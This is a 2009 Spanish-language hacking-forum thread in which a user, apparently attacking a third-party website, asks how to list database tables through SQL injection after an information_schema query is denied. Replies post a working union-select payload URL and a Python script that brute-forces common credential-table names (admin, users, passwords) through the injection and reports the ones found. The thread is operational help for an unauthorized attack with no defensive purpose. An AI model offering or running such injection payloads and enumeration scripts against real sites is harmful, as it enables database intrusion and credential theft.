elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  (DUDA) Haciendo SQL Injection.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: (DUDA) Haciendo SQL Injection.  (Leído 9,264 veces)
flowskull

Desconectado Desconectado

Mensajes: 3


Ver Perfil
(DUDA) Haciendo SQL Injection.
« en: 24 Julio 2009, 04:26 am »

Buenas antes que nada un saludo a todos, mi problema es el siguiente, estoy haciendo "SQL Injection" a una web y me quede estancado por asi decirlo en un paso:


Informacion que he logrado sacar.


Numero de tablas = 7
Mysql Version = 4.1.20
Nombre de la db = emotiu
Usuario de la db = emotiu@localhost
tables visibles = 4,5,6


Ok todo bien hasta alli, pero ahora que hago? intente con éste codigo:

http://www.prueba.com/html/noticia.php?id=-11+union+select+1,2,3,group_concat(table_name),5,6,7+from+information_schema.tables

Y el resultado es:

¡¡ERROR!!: SELECT command denied to user 'emotiu'@'localhost' for table 'tables'
SELECT * FROM noticias WHERE id_noticia = -11 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables

Mi duda está muy clara, si probando de esa forma me da acceso denegado, entonces que puedo usar para lograr saber almenos las tablas, o una recomendacion logica qe me den, creo que tienen la info suficiente jeje un saludo.
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #1 en: 24 Julio 2009, 04:42 am »

Mysql Version = 4.1.20

esa version no soporta information_schema hasta donde se...
saludos
En línea

flowskull

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #2 en: 24 Julio 2009, 04:59 am »

bueno entonces podrias darme algunos tips?
En línea

flowskull

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #3 en: 24 Julio 2009, 16:53 pm »

bueno se supone que si la version 4 no soporta la information_schema y la 5 si.. entonces la 4 es mayor vulnerable cierto? me pueden ayudar?
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #4 en: 25 Julio 2009, 01:11 am »

http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_17609-t244090.0.html
En línea

OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #5 en: 25 Julio 2009, 02:13 am »

Desde la version 5.x , mysql tiene la db information_schema.
Tienes que hacer fuerza bruta para indentificar las tablas.
Saludos¡
En línea

Undersecurity.net
aagos

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #6 en: 30 Julio 2009, 01:15 am »

Hola OzX la fuerza bruta para indentificar las tablas se puede hacer desde la URL o tendria que ser con scripts?
En línea

08l00D

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #7 en: 30 Julio 2009, 01:31 am »

Hola OzX la fuerza bruta para indentificar las tablas se puede hacer desde la URL o tendria que ser con scripts?
podes hacerlo a mano o con un script ya sea en ruby, python, perl etc... es facil lo unico que tenes que hacer es tener una buena lista con nombres de tablas mas comunes o que sean posible que este y pones todo en un array de cadenas lo que seria en python una 'lista'... y vas abriendo la web en un bucle tipo:
http://www.prueba.com/html/noticia.php?id=-11+union+select+1,2,3,4,5,6,7+from+LISTA[ITERADOR]
y por cada resultado si por ejemplo la web te tira un Table 'LISTA[ITERADOR]' doesn't exist ... aumentar el iterador en uno y que siga con el bucle hasta que encuentre una con la que no tire el error entonces la imprimis en la pantalla y listo al menos eso haria yo...
tambien podes hacer lo mismo pero manualmente ir probando con tablas que se te ocurran pero eso si que es un huevo  :xD ...
En línea

aagos

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #8 en: 30 Julio 2009, 01:41 am »

pues me temo que tendre que hacerlo a mano jajajajja porque no se nada de ruby, python, ni de perl muchas gracias porcierto se sabe de alguna vulnerabilidad conocida en MySQL 5.0.27 ?
En línea

08l00D

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: (DUDA) Haciendo SQL Injection.
« Respuesta #9 en: 30 Julio 2009, 02:10 am »

bueno basicamente seria algo asi.... esta en python
Código
  1. import urllib2
  2.  
  3. url = raw_input("Introduce la url + el path vulnerable\n\tejemplo: www.ejemplo.com/xxxx.php?id=\n")
  4.  
  5. tablas = ['admin','tblUsers', 'tbl_users', 'tbl_admin',,'tblAdmin','user','users','username','usernames','usuario',
  6. 'name','names','nombre','nombres','usuarios','member','members','admin_table',
  7. 'miembro','miembros','membername','admins','administrator',
  8. 'administrators','passwd','password','passwords','pass','Pass',
  9. 'user_password', 'usua_login','user_passwords','user_name','user_names',
  10. 'member_password','mods','mod','moderators','moderator','user_email',
  11. 'user_emails','user_mail','user_mails','mail','emails','email','address',
  12. 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  13. 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  14. 'u_password','nick','nicks','manager','managers','administrador',
  15. 'administradores','clave','login_id','pwd','pas','sistema_id',
  16. 'sistema_usuario','sistema_password','contraseña','auth','key','senha',
  17. 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
  18. 'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors',
  19. 'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs',
  20. 'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members',
  21. 'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER', 'username', 'user_hash']
  22.  
  23. inyeccion = "-11+union+select+1,2,3,4,5,6,7+from+"
  24.  
  25. for tabla in tablas:
  26. web = urllib2.urlopen(url + inyeccion + tabla)
  27. source = web.read()
  28. error = "Table 'emotiu." + str(tabla) + "' doesn't exist"
  29. if not error in source:
  30. print "Tabla %s se encuentra en la base de datos" % tabla
  31.  
  32. print "Fin xd"
  33.  
  34.  

Por cierto la lista de tablas esa no es mia la saque de otro script que vi por ahi ....
« Última modificación: 1 Agosto 2009, 01:36 am por 08l00D » En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda con SQL injection « 1 2 »
Nivel Web
Leber 14 11,809 Último mensaje 27 Abril 2008, 15:44 pm
por pedrox@
Duda haciendo un crypter
Programación Visual Basic
aaronduran2 7 2,990 Último mensaje 27 Septiembre 2008, 13:25 pm
por aaronduran2
Una duda de SQL injection
Nivel Web
baZZ 7 5,459 Último mensaje 16 Junio 2009, 00:10 am
por baZZ
duda con sql injection
Nivel Web
papanata 2 2,704 Último mensaje 3 Septiembre 2009, 09:46 am
por papanata
Duda haciendo resize a una imagen...
.NET (C#, VB.NET, ASP)
TrashAmbishion 3 2,179 Último mensaje 15 Septiembre 2016, 03:52 am
por TrashAmbishion
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines